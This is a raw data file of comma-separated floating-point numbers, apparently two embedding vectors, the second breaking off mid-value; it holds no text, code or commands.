0.0015319348,0.012074828,0.01461536,-0.0023588699,0.014687281,-0.01082892,-0.0069273845,-0.021425672,0.02223595,0.0049519856,-0.0061210613,0.013130251,0.017059237,0.038967326,0.014698657,-0.012215294,0.014302549,0.019526126,-0.0034096607,-0.016198682,-0.0029499563,-0.001887165,-0.005661673,-0.022566957,-0.024360878,-0.016418884,0.005252677,0.011350464,-0.028699758,-0.02807223,-0.009155324,0.0128296055,-0.023243291,0.031607702,0.0005967787,-0.002068617,0.011472917,-0.009462539,0.018423473,-0.0111187855,0.020774642,0.016114322,-0.008089644,0.008590623,-0.01387827,-0.004439346,-0.010242058,0.0019809064,-0.016209666,-0.009963828,-0.008293549,0.0164615,0.0031729692,-0.013053634,-0.012026937,-0.0003328109,-0.011747409,-0.008769946,0.003932405,0.014562766,0.012624879,-0.019703794,0.0076489067,0.011299315,0.012557598,-0.0095159765,-0.009394795,-0.007149526,-0.10425398,0.013579081,-0.008531395,-0.00180348,-0.002796987,-0.016879711,0.020033853,0.048891935,-0.00032309428,-0.038305037,-0.0014850674,0.01495669,0.009159894,-0.0022902577,-0.001328607,0.017311238,-0.0062003243,-0.015402082,-0.016573237,-0.0055486695,0.0010788764,-0.0037566326,-0.0011798535,-0.0090488875,-0.009139388,0.023714991,-0.016097004,0.0020793339,0.01976524,0.022815347,-0.008800677,-0.003539986,0.011935142,-0.0054477286,0.003648151,0.010403058,-0.009145557,0.005769318,-0.010627505,-0.0014009367,-0.0048762197,-0.021082208,-0.00378801,0.012446329,0.015291247,0.0040275394,0.018238198,0.011046874,0.0077778376,-0.022265458,0.0019232167,-0.0031315207,0.018401569,-0.00016308091,0.0017390253,-0.010177067,-0.01712811,0.020211333,0.01894576,0.0033750345,0.0033022126,0.008373507,0.0074456874,-0.007932115,-0.009564422,-0.0028256362,0.012059828,-0.030713527,-0.014817862,-0.008665716,0.007392779,-0.004089803,-0.011739005,0.01576567,-0.0011699371,-0.0003433533,0.028257515,0.023542797,0.017316507,0.01920774,-0.012807505,-0.021001102,-0.0032206795,0.012008038,0.004112286,0.0010752252,0.0041666795,0.026708955,0.0021920414,-0.008441822,0.0028788038,0.0035464568,-0.012736218,-0.0043727723,-0.0021079844,0.005511368,-0.023970556,0.031775415,0.019695897,-0.012706644,0.0073997662,-0.0063695884,-0.0008652019,-0.0041234614,-0.08896891,-0.01780093,0.012706054,-0.02075161,-0.006878186,-0.0047295364,-0.0052003027,-0.015271196,0.02382145,-0.0051250556,0.0033357644,0.013196341,0.01252758,-0.0020533353,0.013589165,-0.019056583,-0.043016195,0.011886985,-0.0149305845,-0.0047777686,0.026645014,-0.011956657,-0.037254114,-0.0074045747,0.011491047,-0.00093509565,-0.0005236932,0.017563824,0.016141064,-0.022447772,-0.0017838617,0.0014322355,-0.015528065,0.015480167,-0.0033400343,-0.02945111,0.012687123,0.00043158518,0.0032864995,0.0069041285,0.006170799,-0.021557875,0.008965612,0.0051953406,-0.012249812,0.012180113,-0.0029743568,0.012178318,0.00037046752,-0.0006158274,-0.006887841,0.004805762,0.0040710177,-0.000828902,-0.011877812,-0.016310455,-0.0013790714,0.003331857,0.0017401429,0.014065272,-0.0065002097,0.030435927,-0.021290097,-0.000005841298,0.008764058,0.0036847338,0.0020945966,-0.0081319995,0.0036306872,-0.0026373472,-0.005689802,0.03193075,0.025464922,0.009701839,0.016327592,0.021038916,0.00083619315,0.030541917,0.008229469,0.008256135,-0.027555645,-0.011111514,-0.01307019,0.02591987,-0.015701681,-0.0037333248,-0.0069423444,0.015354704,-0.012854583,0.037536856,0.0066882134,0.03659367,-0.032293063,-0.009428899,0.0026262072,0.0173726,0.02448608,0.0073188213,-0.008589129,-0.01342284,-0.029129406,0.002325473,0.0023982285,0.01723691,-0.014522719,0.00023443645,0.0022591087,-0.0064581726,-0.012875037,0.00021123618,0.026596338,0.014956286,-0.028518729,0.017959611,0.0034255309,0.011160539,-0.006363542,-0.015794426,-0.010571062,0.028948955,0.0027546645,0.027059475,-0.004834616,-0.008192206,-0.02858708,-0.0016527844,-0.008511473,0.023775373,0.0080250865,0.0038872093,0.0052348925,-0.013943028,0.003951367,-0.04555031,0.020743813,0.0033607923,0.01073679,-0.007419775,0.019284561,0.010652871,0.013777078,-0.014228156,0.019238103,0.0065553617,-0.01120556,-0.028871644,0.006048866,0.021076158,-0.011064882,0.015430613,-0.025937473,-0.015371949,0.01207298,-0.0048993356,-0.006906757,0.008149999,-0.03293689,0.0025192518,0.0018254955,-0.0007804863,0.014193419,0.009949147,0.021456722,0.0009210002,0.0005720972,-0.015449379,0.008449948,0.0036498678,0.003982332,0.005563677,0.0061899773,-0.009544756,0.0038915954,-0.03339712,0.010577257,0.026662558,0.04521925,0.032383204,0.01232797,0.015954014,0.010335669,0.0036187952,-0.01863098,-0.0047275615,0.028574528,-0.001570828,-0.019830251,0.005578807,-0.009217719,-0.022401737,0.032208785,0.0016001598,-0.014632982,-0.004678013,-0.0018100581,0.011199702,-0.0026089258,-0.01700523,-0.0077466047,-0.010221231,-0.011684441,0.0048522563,-0.0029103812,0.0029616624,0.000233718,0.004304492,0.0019403872,0.0023586568,0.031395134,-0.009091442,-0.021613235,-0.0018004188,-0.010490156,0.007830262,0.0188168,0.017000498,-0.013669227,-0.042858027,0.022788955,-0.0038741643,0.012596771,-0.020991938,0.02751504,-0.020169867,-0.007977561,0.012683139,0.028005758,-0.0008724545,-0.019290943,-0.012632353,0.007152005,0.019502345,-0.012656738,0.01999062,-0.002620067,-0.010912355,0.0035405688,-0.015366239,-0.017196849,0.003512099,0.014074042,0.024497567,0.02461653,0.0051789694,0.017720032,0.0042292494,0.018666966,-0.008767308,-0.016352732,0.017621014,0.035811253,-0.003993019,-0.006476373,0.0015272694,-0.022007145,0.0023503178,0.0033470483,0.001192788,0.014212726,-0.014069109,-0.0041378937,0.0036474946,-0.018061137,0.004439944,-0.0071414867,0.00037908528,0.020178476,-0.032260224,0.00054525776,-0.0018889414,-0.0027433531,0.015729273,-0.005539682,0.015362762,0.020457014,-0.0045143426,-0.009114913,-0.0026857625,-0.0076659466,-0.00055001857,0.008680069,-0.008549671,-0.008822252,0.006181639,-0.017578261,-0.014166121,-0.014490543,-0.0072416486,-0.0053367685,-0.0033586968,0.0026550684,-0.0034651654,-0.021676289,-0.006575977,-0.015586864,0.011879537,0.029197201,-0.020409767,0.0077895694,-0.0032148128,0.026959104,0.003610837,0.0058603534,0.0028516985,-0.0042295605,-0.006047858,-0.0053187828,0.01763687,0.0059026987,-0.007314735,0.017127568,-0.009612318,-0.015962377,0.035280254,0.008464767,-0.0066750706,-0.023233807,-0.009748313,0.0014353412,-0.010441107,-0.0016828415,-0.010024275,0.02969305,-0.011277115,0.008570432,-0.0067247306,0.029360147,-0.0075159133,-0.010376341,0.022019232,0.024804888,0.026627341,-0.018132322,-0.011763998,0.019688915,-0.016823988,0.019064227,0.01980912,0.02241129,0.022201033,-0.0050897645,0.009301987,0.004460018,-0.015329444,0.005223385,-0.011607795,0.0066873557,-0.0038642262,0.004310351,0.00961128,-0.00027736992,0.003612063,-0.0015137182,0.0116983615,-0.0004805763,0.0011451475,-0.020151632,0.008818589,0.003893445,0.017187713,-0.020982573,-0.0033251336,0.0005201322,-0.000093170514,-0.011569169,-0.0065933056,0.0062591857,0.019033633,-0.030908264,-0.0012214272,-0.015015781,-0.002454474,-0.012110143,-0.0015820394,-0.011333108,-0.08838978,0.0090791,0.005546587,-0.009691865,0.0032501582,0.030084452,-0.033437446,-0.009331183,-0.014519994,-0.0018831957,-0.022082293,-0.005781538,-0.0010292449,0.007172747,0.0056880945,-0.0033826148,0.0016942187,0.0021134936,-0.002173862,-0.015368332,-0.019370293,0.024682755,0.013203434,-0.003740704,0.001998987,0.01965826,0.0006093455,0.008324109,-0.009425292,0.00004447578,0.011934045,-0.0053885267,-0.010939328,-0.008270632,-0.0038958301,0.011414475,0.0038873048,0.022023512,-0.014838514,-0.016251987,0.01063544,-0.015887931,0.016284984,0.0121025555,0.013142325,0.029994788,-0.017720172,-0.03091288,-0.0076151667,0.0016571933,-0.0023713408,0.010335336,-0.0069600604,0.012404513,0.026735919,0.025749318,-0.014081669,-0.00006733157,0.021985743,0.000464297,-0.015965769,-0.00009380099,0.019262636,-0.00015789048,0.0069625056,0.01680062,-0.008244623,0.023086581,-0.011667011,0.023176128,0.01687618,-0.024993114,-0.042573128,0.014028823,-0.009579855,0.019162586,0.011044735,-0.017085703,0.019922243,0.0024718978,0.002508277,0.0034089226,0.0023128926,-0.0009843841,-0.013799476,0.0031783264,0.0054698437,0.012488075,0.03297323,0.003847507,0.011466373,-0.004390388,0.009816845,-0.014181204,0.002002491,0.00092481636,-0.0071247495,-0.015106853,0.019708429,0.013960147,-0.004737153,-0.006074097,0.016452707,-0.0119083235,0.0010746274,-0.0008018262,-0.008383873,0.0059968284,0.010200329,0.012581606,-0.01731664,0.009130468,0.021388132,0.017422626,0.0066809896,-0.0031558096,-0.010266786,0.014733089,-0.0014696006,-0.005568333,-0.00051956024,-0.025137115,-0.00471005,0.0048459303,0.003150704,0.007864293,0.0046553863,0.0038142048,-0.023019848,-0.0066947923,-0.010008,0.022227535,0.023203865,0.021626009,-0.00079324265,0.028199712,-0.0083933715,0.0040754527,-0.015315057,-0.002307704,-0.003956164,-0.030404825,-0.014815391,-0.0063058953,-0.0121791605,0.054668173,-0.009775963,-0.004209363,0.009128995,-0.0039761774,0.016872153,-0.0068302094,0.0034120271,0.008998645,0.0020313915,0.0009193205,0.0124456175,0.017484345,0.007828854,-0.002184961,0.019100524,0.0002444098,0.0068181893,-0.00042621442,-0.013276288,0.019473577,0.007648602,-0.00011986631,-0.007385041,-0.027054623,-0.010874108,-0.0056642755,0.009119631,-0.013131924,-0.022043157,0.006436277,0.029171502,0.0047434,-0.0012643037,-0.008265591,-0.016016996,0.0068413783,-0.002018815,0.002967331,-0.032463823,-0.0024299298,-0.012432276,-0.013031316,0.0014422676,-0.022490997,-0.008185164,0.006292149,0.007434235,0.025614606,-0.034197837,-0.021236898,0.019274736,-0.006211245,-0.013816323,0.021065986,-0.015283613,-0.0046793255,-0.0016810404,0.024521025,0.01710053,0.023872804,0.0035853665,-0.010184519,0.013571066,0.006619132,0.012842107,0.022648726,-0.01709955,0.119143255,0.03375361,-0.010926943,0.013203615,0.00063500134,-0.003955138,0.030448634,0.021517172,0.010306106,0.019430384,0.0038346495,-0.0048521394,0.015019326,-0.015473265,-0.025039237,0.016638469,0.028683614,-0.0028482482,0.0017791579,-0.02301748,0.0147826215,-0.031199101,0.001267927,-0.026374621,0.0025335252,-0.04376918,0.010276707,0.014304638,0.0031405825,0.028918765,0.011073336,0.02200502,0.022852385,-0.006797164,-0.02758231,-0.013053267,0.012638174,-0.018137898,0.0039286325,-0.0053006737,-0.0005994422,0.020441132,0.016111432,-0.008364616,-0.02863243,0.020547075,0.0072367485,-0.00683815,0.00079195277,-0.009961962,0.01420356,0.007839197,0.0037742183,0.0050985273,0.00471402,0.008467825,0.006268681,-0.004641181,-0.012077379,-0.009728168,0.03296311,-0.010502989,0.005551531,-0.0020244422,0.037909426,0.007266869,-0.023088062,-0.00703156,-0.03158705,-0.03617727,0.014665204,-0.019258069,-0.009469517,0.005470316,-0.010931498,0.031156294,-0.006957346,-0.020183852,-0.008850645,-0.017321829,-0.011321184,-0.0029617453,-0.01110703,-0.011511642,-0.018474441,0.0024245088,0.0027451648,0.0032737688,-0.011332112,-0.0026471324,-0.0024527123,0.007936905,-0.0057587503,-0.01001214,-0.014110248,0.001020223,0.03029589,-0.027779924,0.0043340423,-0.0026838998,0.0023665435,-0.002650217,-0.008187983,0.0002693234,-0.0140061835,-0.003193344,0.0004173191,0.023132235,-0.005809849,0.0038197187,0.0066658515,0.0029781521,0.014796096,-0.0003737586,-0.0052481443,-0.009774406,-0.006902636,-0.027354114,0.008704536,-0.011434098,0.004530981,0.011423699,0.009207325,0.020284712,0.00013761983,0.00096047577,-0.011327974,0.002693016,0.021277795,-0.0049272864,-0.0049014315,-0.050050937,-0.0034018646,0.025985846,0.004757695,0.0075402493,0.033685163,0.017296502,-0.004362793,0.00045155475,-0.0021341727,0.0018348942,-0.01575278,-0.016758062,0.011057789,-0.01347549,0.021270333,0.00078866456,-0.0018815215,0.0047316113,-0.0149937235,-0.015647454,0.0011590103,-0.007583091,-0.0054122894,-0.0036263203,0.016758557,0.009184712,-0.01506377,-0.017997418,0.013902199,-0.009177339,-0.013632652,-0.043665346,0.0016563983,0.00032075378,0.011342277,-0.016855218,0.00040914796,0.016250558,-0.011175411,-0.0041129943,-0.012833414,0.029158281,-0.009977665,-0.0053073163,-0.012436097,0.0053585432,-0.028653009,0.0027260007,0.022475174,0.018282803,0.0046705534,0.008609722,0.013908294,-0.02351106,0.0053039743,0.011179394,0.0025884213,0.034711026,-0.0009982453,0.041418392,-0.009852255,0.0077529904,-0.00037037604,0.0023089766,-0.032849066,0.035024326,-0.025039585,-0.04190168,-0.0056752465,-0.010099584,-0.016442403,0.01634398,0.009963341,0.00924979,0.0021228816,-0.0071661086,-0.006787054,0.011565416,0.013826705,0.007925916,-0.005227034,-0.011500378,-0.0011363929,0.007668385,-0.008025492,-0.008446998,-0.025964718,0.0055567403,0.011668586,-0.041068986,0.00023945763,0.0006164528,-0.006401657,-0.011817815,0.0015149452,0.024975318,0.010258033,-0.016671974,-0.015813606,-0.0048859552,-0.005344048,-0.0170628,-0.017013956,-0.010033895,0.021973081,0.0007405185,-0.018709807,-0.004871443,-0.012360097,-0.01735163,0.006212808,0.008037391,-0.030097902,0.012363521,0.00076786557,-0.006267171,-0.0109383855,-0.036140244,-0.018975098,0.009468512,-0.02949999,0.0026129363,-0.013412358,-0.010751177,-0.010410248,0.012324518,0.0032260488,-0.0072214487,0.000508897,0.0060104555,0.0085596545,0.0009905704,0.0071419613,-0.011037092,0.019836465,-0.021528624,-0.0007491361,-0.020412726,-0.008755644,0.010667942,-0.025792323,-0.010869856,-0.026984831,-0.0049854154,-0.011123722,-0.020207062,-0.012463447,0.012587207,0.006421849,-0.0118920095,0.012417719,-0.0060192384,0.0065012258,-0.003378894,0.008197565,0.026659323,0.05526506,-0.05123702,0.004823363,0.042626817,-0.0008436281,-0.003782805,0.0024926455,-0.017280746,-0.06917593,-0.026575211,0.032231584,-0.023035567,-0.012964518,-0.008423967,0.0034086618,-0.0129445875,-0.0125898095,0.0014760204,0.013307283,0.0030060841,-0.00063329533,0.015325764,0.004189278,-0.0014564109,0.0045547653,-0.033457395,-0.017339416,-0.0064649126,0.011360846,0.0052423207,-0.0004754038,0.008758619,-0.00580766,-0.021961575,0.015215988,-0.015709834,0.00069505494,-0.011460572,0.012411137,-0.010200422,-0.045074414,-0.036509875,0.009518939,-0.012594161,0.0019985905,-0.0044960594,-0.025228694,-0.0020137422,-0.0029825408,0.16019036,0.0037339379,-0.0004184872,-0.011731151,-0.007869373,-0.018045498,-0.003596768,0.008996644,-0.012751953,0.03148535,-0.0067741084,-0.020427508,0.013231528,-0.0070465608,0.019758696,-0.025427425,0.010607459,0.16453195,-0.012540467,0.029506683,0.023410002,-0.00621837,0.027336063,0.0073196604,0.0025997206,-0.040981717,0.0023585043,-0.034273647,0.012158914,-0.009024268,0.0077693434,0.021416906,-0.027405998,-0.0028066451,0.009262899,0.022109168,0.011954398,-0.012151658,-0.019907568,-0.004603096,-0.003988388,-0.026056806,0.012891013,0.017983824,-0.0027816815,0.00927162,-0.0060864785,-0.009915714,0.027971331,0.039738566,0.0118627325,-0.0051958156,0.009088376,-0.014122784,0.0104758125,0.010059575,0.0020545716,0.0030444067,-0.023593314,0.018507008,0.003252249,0.023764893,-0.006931474,-0.017856538,-0.021319479,-0.0088091465,0.010598617,-0.012821692,0.0038438453,0.010729505,0.0015148831,-0.0026071002,-0.027549962,0.00021059993,0.0015812534,-0.0067967656,-0.0004474125,-0.017232947,0.017095089,-0.02360609,0.017679272,0.016193055,-0.015507048,-0.0024670064,0.013444478,-0.0010761071,0.015558251,0.005907014,0.011882618,-0.0031912779,-0.010036626,0.002653727,0.0055423407,-0.021569591,-0.012325737,0.019759212,-0.013659951,-0.0000030744573,0.0074093062,-0.01142249,-0.02865864,0.022955151,-0.0077449824,0.0030252782,-0.00088416,0.015448843,-0.021374242,-0.007949129,-0.012522381,-0.0045791906,0.0067428853,0.0064491364,0.010108377,0.008691327,-0.0152665395,-0.0047545354,0.0033137763,0.008685216,-0.015434187,0.0074630897,-0.011471315,-0.013642599,0.024428248,0.026591742,-0.03221278,-0.014946031,0.004247145,-0.00019233668,-0.035575423,-0.0026276626,-0.012333878,-0.006835857,0.02036964,0.03380086,0.0039144545,-0.0049258783,-0.0031506035,-0.039338224,-0.022394732,-0.008648209,-0.010618413,0.014847147,0.020699222,0.020966265,-0.009177059,-0.0038906105,0.0025403602,0.016861817],[0.008406699,-0.002856394,0.002673179,-0.013470182,-0.0009032637,-0.030692168,-0.021570364,0.0052465666,0.012205694,0.0040910994,-0.0009792922,0.0083149765,0.003936721,-0.00045381548,-0.006026447,-0.0032604039,-0.0036675516,-0.010259004,0.018814562,0.0034728309,0.00774732,-0.011094364,0.010974531,0.024222435,0.017204035,0.026393263,0.000058159585,-0.0012356181,-0.0007511356,-0.013166946,-0.0012487281,0.02442775,-0.006185879,-0.007876037,0.0102129225,0.0018242992,0.014845439,-0.0076354546,-0.006218564,-0.011268114,0.021475947,-0.0065842294,-0.015186319,0.0019961884,-0.013439449,-0.0150428675,0.015252259,-0.0122748865,-0.00803976,0.0009171745,-0.009938614,0.004404023,0.001687491,0.009762603,0.0033627353,-0.008943113,-0.0059677,-0.02736382,0.042330623,-0.018229285,-0.00469117,-0.006947972,0.0068975473,0.0035125825,0.021070551,-0.027992925,0.012618378,0.0029697958,-0.009749714,-0.0071026795,0.032496188,0.0033605227,0.011388117,0.013308796,-0.0019257121,0.002302702,-0.009292806,0.002034069,-0.026232092,-0.015198542,-0.021574775,-0.022333877,0.007630054,-0.012941112,-0.015717024,0.0028546206,-0.026095582,-0.008651394,-0.00995899,-0.019758202,-0.007896923,0.013981198,-0.006002991,0.004666729,-0.012000811,0.0042568985,0.018519182,0.0007828558,0.004033467,-0.002651841,0.0060659894,-0.02046251,-0.019008556,0.012580449,0.010074139,0.019065522,0.003218533,0.019028816,0.013604679,0.014105251,-0.004658291,0.011985195,0.020094726,0.0063187,-0.016195282,-0.016661417,-0.0041181385,0.009993237,-0.027365455,0.019043071,0.013155568,0.004626919,0.016317973,0.0030262927,-0.012674644,0.005427108,0.008535097,0.0072457893,-0.016553897,-0.01851696,-0.007793995,0.021002138,0.0034848948,-0.0026159352,0.0032536003,-0.02054319,0.003257685,-0.0016993652,0.0013250327,-0.0249491,0.035656802,0.0009894718,0.022526868,0.013493092,0.0109830145,0.010698124,-0.004772657,0.01846872,0.034046214,-0.014608894,-0.010809615,0.022842549,0.019146344,-0.016224258,0.016415972,-0.005391885,0.0038146887,-0.007893636,-0.0034923833,-0.004159814,-0.00921237,-0.010426776,0.0020785427,0.026883183,-0.017289676,-0.020805048,0.010803674,0.001353254,0.01437343,-0.020763706,0.0065607415,0.013860867,0.0010726812,0.00021069813,0.004540968,-0.00691039,0.017435273,0.0041237953,-0.018271772,0.0076761027,-0.00105211,0.026528284,0.0073760115,0.0066919005,-0.016091023,0.017859077,0.0045256848,0.02567667,0.0052972417,0.021250522,-0.016311506,-0.0056692865,-0.0074282307,-0.010255769,-0.013626545,-0.006137312,-0.009648348,0.095334545,-0.024763646,-0.019071706,0.005735171,-0.005280582,0.009952469,-0.0013382507,-0.026690355,-0.014806452,-0.0070779207,-0.0025813438,0.011374971,-0.008749096,0.012386468,-0.00327476,0.033978667,-0.0021711483,0.020453038,-0.07999328,0.011099044,0.022562867,-0.014103446,0.0058917366,-0.0072938073,-0.0013137542,-0.007094376,0.0034684066,-0.0040768785,-0.005878053,0.024614716,-0.018136235,0.0009944988,-0.034125473,-0.0028732663,0.011870864,-0.030019697,-0.007302819,-0.00088684825,-0.03280167,0.009462762,-0.01406043,0.0030596575,-0.004101215,-0.009488501,0.0102311,0.0032839861,0.006245827,0.017337045,0.0063915346,-0.000027505,-0.010755887,0.0010103662,-0.01992022,-0.020307483,-0.019898593,0.007402294,0.012973748,-0.0017763276,-0.0054059797,-0.019430062,0.0030899849,0.012781871,0.0068626422,0.009125127,0.008244589,-0.023282276,0.021595536,0.0135408845,-0.0026608328,0.023508847,-0.04082939,-0.01958263,-0.014413019,-0.03111399,0.0085539725,0.00070321746,-0.008021984,0.020048387,0.02961603,0.02206957,0.014476756,0.010956615,0.0050517493,0.0019573986,-0.023756247,-0.0024595265,-0.0095331995,-0.041615747,-0.013028268,0.014904259,-0.004174831,0.021140113,-0.023699624,0.0022265515,-0.0013690044,0.021514265,0.0040794555,-0.0040752324,-0.0286323,-0.051505756,0.024621109,0.0053220494,0.0005593183,-0.016109342,-0.025039554,0.018819317,-0.00042706047,0.0060782265,-0.023617553,0.014453891,0.006742873,0.008833239,-0.0053571276,-0.003570391,-0.013007566,0.015548033,0.028842531,0.034656543,0.023266198,0.0060471296,-0.012618597,0.010894505,0.007769226,0.0016782036,0.008250481,-0.0035298315,-0.006968713,-0.013386966,-0.0046912935,0.016030729,0.013569938,0.0055596405,0.020310953,0.007172581,-0.006509607,0.016585873,0.020617941,-0.021099709,-0.0027508368,0.0034286275,0.014084809,0.0047471123,0.024484186,0.006276381,-0.00711215,0.004472575,-0.00654424,0.010691437,0.023560615,0.02161768,-0.021540245,0.018544976,-0.016308228,0.010946425,0.003435893,-0.008563518,-0.01082181,-0.03421997,0.0056360736,-0.018372804,-0.0060755825,-0.003078048,-0.01462959,0.009847741,0.00075438974,0.011107437,-0.010815816,0.100711256,0.0029926933,-0.0048531434,0.010044154,-0.022657096,-0.00935587,0.018413048,0.003396145,0.01793371,-0.0108034015,-0.020441465,-0.0019355965,0.008313906,0.016510593,0.01251176,-0.00607093,-0.022916378,0.00892293,-0.01559646,-0.024878504,0.020526724,0.0017123775,-0.035116006,0.02702486,0.013392318,-0.002951642,0.009433096,0.014514514,0.019437836,-0.0099649625,0.0051547666,-0.016231375,-0.00010507855,-0.0016163621,-0.013519808,0.0075129396,0.0086429,0.015899515,0.011098263,-0.004476103,-0.0017531284,-0.003384656,0.009298624,0.012653454,-0.008123832,0.025296675,-0.0065873438,-0.0063168304,-0.0018308546,0.0040594195,0.020868897,0.024375593,-0.028222537,0.026243662,0.010148535,0.0219798,0.020385189,-0.00695841,0.009232785,0.014734391,0.03620737,0.008471807,-0.02931037,0.027776914,-0.0023358073,0.014819356,-0.00092064904,0.0032003312,-0.0224612,-0.01646434,0.0073106866,0.025985947,0.022522641,0.006409745,-0.022323957,0.004981859,-0.004744097,-0.017872859,-0.004982951,-0.017829474,0.015321223,0.028798651,-0.000008856803,-0.002983522,-0.0127027165,-0.012330241,0.020003079,0.0051669097,0.002096689,-0.018978324,0.031239087,-0.007925559,0.018984446,-0.015975842,0.0070839976,-0.020783689,0.04426461,-0.034137852,-0.0060953177,0.008686688,-0.01917023,0.0031892143,0.009942448,0.010868006,-0.011094669,-0.012598587,0.0059301187,-0.014256462,-0.0009398023,0.027914265,-0.0101923235,-0.006804021,0.0026729924,0.017732296,0.0017432611,-0.0076498943,-0.012871526,-0.0058775563,-0.009575702,0.0115613965,0.009902386,0.014440102,0.019139776,0.016986147,-0.008949848,0.032923404,-0.0026002293,-0.001033122,-0.009971942,0.033281397,-0.0023132653,-0.012501039,0.0023961714,-0.03160779,-0.013620924,0.017183483,0.01626109,-0.03025612,0.018837323,-0.00592041,-0.0010826541,0.0036399795,0.008079626,-0.008766255,0.0031968628,0.022552874,0.027442662,-0.005832221,0.0148206055,-0.0053030737,-0.014999235,-0.0024957864,-0.0006434124,-0.015444374,0.014718434,-0.016325861,0.01069172,0.010067399,0.003140652,0.0039505092,0.02631924,-0.0086067645,0.0075923917,-0.0007451534,-0.023773195,0.021736097,0.017484492,0.07616565,0.009551835,0.004383234,-0.00012752268,0.0035810517,0.000052369087,0.026783656,0.015749654,-0.01744679,0.008826581,-0.009511218,0.0017464302,0.00842071,0.01888465,-0.0050884224,-0.012140532,0.009476116,-0.008098668,-0.0067665232,0.00093714625,0.007078514,0.0055502867,-0.009944247,-0.030967679,-0.021798924,-0.0033193708,0.027956534,0.023701422,0.0011879856,-0.011244522,-0.008469398,0.018579196,0.015067671,-0.00080682593,0.010103217,0.013317807,-0.00041967526,-0.0013043918,0.0043010893,0.02853662,0.017306319,-0.014558687,0.027102085,0.017370628,-0.007722942,0.00518273,-0.017724447,0.0010847477,0.00076000334,-0.007901106,-0.016307386,0.017359283,0.0029221096,0.011415041,-0.0054179803,-0.0004831241,0.02575186,0.01456879,-0.01376668,0.022307482,-0.014126696,0.020708127,-0.0010713366,-0.025909731,-0.0028818625,-0.006321846,0.013856834,-0.01928057,0.006291252,-0.029265875,-0.008400016,0.0067321504,0.036427177,-0.0016262863,0.0043197875,0.01647224,0.013037579,0.010872016,0.016245784,-0.007210271,0.0032245913,0.010987718,-0.022347745,-0.013281672,0.008000167,0.005718024,0.0019790486,0.021393633,-0.0033927327,-0.02712817,-0.0040059676,0.011279059,0.0075547565,0.012946521,-0.002453917,-0.007190566,-0.00557895,0.0028621133,0.0022388005,-0.0003417578,0.0008712766,-0.01827372,-0.0107920645,0.010943039,-0.012204853,-0.013207148,0.004213148,0.014938988,0.005311003,-0.04033331,0.0034946245,-0.06879478,0.010643514,0.018259967,0.008525455,-0.025683757,0.051975183,-0.0261857,0.014112383,-0.00091996085,-0.0075349696,-0.006026946,0.016000587,-0.01473027,0.0043688286,0.011481298,0.01349784,0.0047221975,-0.018346742,-0.0010585649,-0.046416648,0.011107887,0.021474527,-0.016583672,0.0052196016,-0.013039138,0.011552479,-0.013059027,0.008080661,0.005765498,0.0023881067,-0.021385672,0.020507377,-0.0053660157,0.008399509,0.015943294,-0.024950042,-0.0077880085,0.020092303,-0.0034839348,-0.015654402,-0.0030624806,-0.019483907,-0.026388323,0.001542296,-0.026982153,0.029421303,-0.028835397,0.004292931,0.0033823394,0.008804694,-0.0041055907,0.0027890436,0.0058743935,0.019491218,0.00067145354,0.012495981,-0.010784051,0.024686007,-0.008143411,-0.020161305,-0.00072953023,-0.008608832,-0.020332523,-0.008310272,0.012030388,0.012869954,0.03144788,0.013291259,-0.011105644,0.010958622,-0.009811274,0.027464148,0.025062183,0.018737614,-0.0006631074,0.014150854,0.008683039,0.009330978,-0.01017504,0.00092542695,0.0055221533,-0.0359655,-0.020794414,0.014496812,-0.009080006,-0.012811028,-0.0009822886,-0.01281954,0.006217479,-0.01831479,-0.0043599973,-0.0034084357,-0.036042444,0.008725445,0.0138361,0.010338889,-0.014581663,-0.03142491,-0.006427955,0.012677307,0.03509952,-0.019446589,0.0034385934,-0.021786029,-0.005133401,-0.011375416,-0.027357724,-0.009526905,-0.011563788,0.022757923,0.00013504918,0.024990056,-0.0058380663,-0.005051605,0.024586372,0.03224416,-0.020938642,-0.004913197,0.00709117,-0.009178067,-0.0017554372,0.0185604,0.0026576782,-0.02891595,-0.008612203,0.008561197,-0.0210637,-0.016978165,0.007434215,0.01774776,0.030424597,-0.0013897126,0.009839816,0.018013807,-0.005714142,-0.014822663,0.017433641,-0.0102755325,-0.01151594,0.00078193814,-0.017651148,-0.0144960815,-0.011801942,-0.011882118,0.019414864,0.010253673,-0.012096767,0.0051823803,-0.01584817,-0.0037938696,0.0072883237,0.023499163,-0.020008015,-0.0073690093,-0.034013215,0.011084424,-0.0074222283,0.0048969616,0.0045514414,0.0053885495,-0.006719465,0.0055642193,-0.0109029375,-0.0018377207,0.014795592,0.016447024,-0.027100485,0.01738175,0.005354019,0.012705389,0.0036346288,0.002503184,-0.0022668692,-0.0036061383,-0.0120642,-0.017798243,-0.029453017,0.0045465734,-0.009488175,-0.008087476,-0.0020612571,-0.00016356658,-0.047097214,0.0069297897,0.004286167,0.0014281853,-0.014056663,-0.008770289,-0.0025181598,-0.0135567,-0.013749731,0.035869416,-0.0016749527,-0.03438317,-0.005950593,0.03208401,-0.00898214,0.0055521918,0.0047500525,-0.027940752,0.018141015,0.00638937,-0.03394144,0.017986063,0.0026539846,-0.0017753139,0.00072815386,-0.0034518698,-0.026181605,-0.016116675,-0.0105880005,0.006017609,0.013859871,-0.0011037,0.016627898,0.022949532,0.004895137,0.0058106855,-0.017090304,0.0012713375,0.010459318,-0.012742296,0.014608195,0.0024519116,0.0041529783,-0.010384183,-0.02803778,0.031184059,0.0039296416,0.0043469835,-0.006203926,-0.007759788,-0.004860571,-0.0034352972,-0.014826434,-0.01576778,-0.01561887,-0.007347205,-0.0198227,-0.00034786938,0.0077296467,0.02144502,-0.009179241,-0.0019081229,0.010735467,-0.017941477,0.003943694,-0.020682508,-0.0131235905,-0.009998975,0.027095301,-0.040648337,0.017157603,-0.020248687,0.01851513,0.012946337,-0.028250832,0.0027294636,-0.0051844646,-0.0035211386,0.020494875,-0.013188989,0.006476717,-0.0068064714,0.000022226288,-0.005942913,-0.009884585,-0.002353765,-0.011046375,0.0071025803,0.017387334,0.019401476,0.0044978075,0.02889353,-0.0134072155,0.005770391,0.014178882,-0.022613598,0.03147828,-0.01724705,0.009314826,0.0063472074,0.01781999,-0.011403978,0.009970182,-0.00900004,0.00023307082,0.0025610267,0.0030534277,0.016974322,-0.009339408,0.009081235,0.0046070805,0.0046369354,0.005345588,0.014477065,-0.034607865,0.02348079,0.010897492,0.0025812953,0.0072140615,0.011300233,-0.0039653666,0.0031338295,0.03400785,-0.0035036413,0.002728311,-0.013224186,-0.009021644,-0.012648711,-0.006088855,-0.02678476,-0.03846302,0.0073909336,-0.0029165586,-0.022139609,-0.023925046,0.02308664,-0.003498522,-0.0056742